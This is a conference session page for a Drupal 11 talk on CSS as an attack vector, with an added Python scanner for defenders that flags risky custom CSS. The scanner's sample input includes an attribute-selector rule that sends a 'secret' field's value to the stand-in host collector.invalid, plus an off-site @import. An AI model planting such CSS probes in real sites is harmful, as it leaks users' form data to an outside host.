Stylish, yet vulnerable: CSS and security in Drupal 11

Room: Amphi "Bleu de Sassenage" | Audience: Expertise | Time slot: Thursday 14:45 - 15:25 (09/04/2026)
Description

Warning: this session will run from 15:10 to 15:30 (shared slot).

CSS is usually treated as “just styling.” However, documented security research shows that it can be leveraged as an attack vector under certain conditions. From CSS injection and data exfiltration techniques using attribute selectors and external resource loading, to the historical :visited history leak and CSP bypass scenarios, CSS has a non-trivial security footprint.

In Drupal 11, these risks intersect with real-world features:

  • Custom CSS capabilities (themes, contrib modules, layout tools)
  • CKEditor 5 and text format permissions
  • Asset libraries defined in *.libraries.yml
  • Content Security Policy configuration
  • Role and permission management

This session will break down realistic attack scenarios involving CSS in a Drupal environment, explain why they work, and outline concrete mitigation strategies. The goal is not fear, but clarity: understanding where the risks truly lie and how to address them responsibly.
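As an added example (not from the session or from Drupal core), a small Python check that a site team can run over custom CSS coming from themes, contrib modules or a custom-CSS feature before it ships. It flags the pattern the abstract names, attribute selectors paired with a resource load from a host the site does not control, and any off-site @import. The allow-list, the sample CSS and the `.invalid` hosts are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts this site legitimately loads assets from (assumption: set per deployment).
ALLOWED_HOSTS = {"cdn.example.org"}

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
IMPORT_RE = re.compile(r"@import\s+(?:url\()?\s*['\"]?([^'\")\s;]+)", re.I)
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)   # flat "selector { body }" pairs
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.I)
ATTR_OP_RE = re.compile(r"\[\s*[\w-]+\s*([\^$*~|]?=)")  # =, ^=, $=, *=, ~=, |=


def off_site(urls, allowed_hosts):
    """Keep absolute or protocol-relative URLs whose host is not allow-listed;
    relative paths and data: URIs have no host and are ignored."""
    out = []
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        if host and host not in allowed_hosts:
            out.append(url)
    return out


def find_suspicious_css(css, allowed_hosts=ALLOWED_HOSTS):
    """Flag (a) @import from a non-allowed host and (b) any rule that pairs an
    attribute selector with a resource load from a non-allowed host."""
    css = COMMENT_RE.sub("", css)
    findings = [{"kind": "import", "url": u}
                for u in off_site(IMPORT_RE.findall(css), allowed_hosts)]
    css = re.sub(r"@import[^;]*;", "", css, flags=re.I)
    for selector, body in RULE_RE.findall(css):
        urls = off_site(URL_RE.findall(body), allowed_hosts)
        ops = ATTR_OP_RE.findall(selector)
        if urls and ops:
            findings.append({"kind": "rule", "selector": " ".join(selector.split()),
                             "operators": ops, "urls": urls})
    return findings


# Constructed sample input: one benign theme rule, one probe-style rule, one import.
SAMPLE_CSS = """
.node--teaser { background: url(https://cdn.example.org/bg.png); }
input[name="secret"][value^="a"] { background: url("https://collector.invalid/?v=a"); }
@import url("https://collector.invalid/extra.css");
"""

if __name__ == "__main__":
    for finding in find_suspicious_css(SAMPLE_CSS):
        print(finding)
```

Rules nested inside `@media` blocks are still matched because the regex works on the innermost `selector { body }` pairs; a finding is a review prompt, not proof of malice.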

Session length
20 min
Prerequisites (specific concepts or knowledge to be familiar with)

Required

  • Basic understanding of how CSS works (selectors, properties, external stylesheets)
  • General familiarity with Drupal site building concepts (themes, modules, permissions)
  • Awareness of common web security terms (e.g., XSS, CSP, injection), even at a high level

No deep security expertise is required.

Recommended (Helpful but Not Mandatory)

  • Experience working with Drupal themes or *.libraries.yml
  • Basic understanding of Content Security Policy (CSP)
  • Familiarity with Drupal text formats and role permissions
  • Some frontend development experience

What attendees will have learned after this session

By the end of this session, attendees will:

  • Understand how CSS can be used as an attack vector
  • Recognize realistic CSS-related risks in Drupal 11
  • Identify misconfigurations that increase exposure
  • Apply concrete mitigation strategies
  • Improve collaboration between frontend, backend, and security teams
  • Leave with a practical hardening checklist for real-world projects

Presentation language
English

Presented by

Nicoloye

CTO at Smile

Grenoble, France

Nicolas is an active member of the French Drupal Association. He joined the community in 2006 and has been a Drupal enthusiast ever since. He has participated in several community projects and initiatives. He is Chief Technology Officer at Smile. When he is not coding he likes any kind of game (board, card, tabletop roleplaying, etc.) and spending time with his cat.

Other sessions at the same time

Dompter le Refactoring

Amphi "Tarte aux noix" | by nerea